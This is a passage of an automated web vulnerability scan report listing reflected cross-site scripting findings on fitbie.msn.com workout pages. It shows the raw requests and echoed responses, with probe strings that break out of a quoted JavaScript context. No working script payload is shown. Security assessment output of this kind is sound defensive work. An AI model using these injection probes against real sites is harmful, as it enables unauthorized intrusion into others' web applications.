GET /weight-loss-basics/tips9e60e'%3bb39761af491/6-happiest-ways-beat-belly-fat HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:45 +0000
ETag: "1297607865-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:37:45 GMT
Date: Sun, 13 Feb 2011 14:37:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/tips9e60e';b39761af491?destination=node%2Ftips9e60e';b39761af491&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.122. http://fitbie.msn.com/workout/15-minute-workout-strengthen-your-body-and-mind [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/15-minute-workout-strengthen-your-body-and-mind

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d82a7'%3bc0805125aa8 was submitted in the REST URL parameter 2. This input was echoed as d82a7';c0805125aa8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/15-minute-workout-strengthen-your-body-and-mindd82a7'%3bc0805125aa8 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:01 +0000
ETag: "1297607761-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:01 GMT
Date: Sun, 13 Feb 2011 14:36:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/15-minute-workout-strengthen-your-body-and-mindd82a7';c0805125aa8?destination=node%2F15-minute-workout-strengthen-your-body-and-mindd82a7';c0805125aa8&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.123. http://fitbie.msn.com/workout/3-moves-rev-your-metabolism [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/3-moves-rev-your-metabolism

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30265'%3b2ece6d7e2f6 was submitted in the REST URL parameter 2. This input was echoed as 30265';2ece6d7e2f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/3-moves-rev-your-metabolism30265'%3b2ece6d7e2f6 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:58 +0000
ETag: "1297607758-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:58 GMT
Date: Sun, 13 Feb 2011 14:35:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/3-moves-rev-your-metabolism30265';2ece6d7e2f6?destination=node%2F3-moves-rev-your-metabolism30265';2ece6d7e2f6&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.124. http://fitbie.msn.com/workout/bob-harpers-fat-blasting-workout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/bob-harpers-fat-blasting-workout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9793c'%3b6f4e047b771 was submitted in the REST URL parameter 2. This input was echoed as 9793c';6f4e047b771 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/bob-harpers-fat-blasting-workout9793c'%3b6f4e047b771 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:02 +0000
ETag: "1297607762-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:02 GMT
Date: Sun, 13 Feb 2011 14:36:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/bob-harpers-fat-blasting-workout9793c';6f4e047b771?destination=node%2Fbob-harpers-fat-blasting-workout9793c';6f4e047b771&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.125. http://fitbie.msn.com/workout/lose-last-10-pounds [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/lose-last-10-pounds

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2747e'%3ba47c1c34509 was submitted in the REST URL parameter 2. This input was echoed as 2747e';a47c1c34509 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/lose-last-10-pounds2747e'%3ba47c1c34509 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:58 +0000
ETag: "1297607758-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:35:58 GMT
Date: Sun, 13 Feb 2011 14:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/lose-last-10-pounds2747e';a47c1c34509?destination=node%2Flose-last-10-pounds2747e';a47c1c34509&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.126. http://fitbie.msn.com/workout/mens-health-muscle-system [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/mens-health-muscle-system

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc994'%3b6c72705acc1 was submitted in the REST URL parameter 2. This input was echoed as bc994';6c72705acc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/mens-health-muscle-systembc994'%3b6c72705acc1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:02 +0000
ETag: "1297607762-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:03 GMT
Date: Sun, 13 Feb 2011 14:36:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/mens-health-muscle-systembc994';6c72705acc1?destination=node%2Fmens-health-muscle-systembc994';6c72705acc1&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.127. http://fitbie.msn.com/workout/muscle-memory-workout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/muscle-memory-workout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dbdc'%3b02483d4f73f was submitted in the REST URL parameter 2. This input was echoed as 5dbdc';02483d4f73f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/muscle-memory-workout5dbdc'%3b02483d4f73f HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:06 +0000
ETag: "1297607766-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:06 GMT
Date: Sun, 13 Feb 2011 14:36:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/muscle-memory-workout5dbdc';02483d4f73f?destination=node%2Fmuscle-memory-workout5dbdc';02483d4f73f&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.128. http://fitbie.msn.com/workout/small-changes-big-results [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/small-changes-big-results

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c49d2'%3b21edd9f2902 was submitted in the REST URL parameter 2. This input was echoed as c49d2';21edd9f2902 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/small-changes-big-resultsc49d2'%3b21edd9f2902 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; 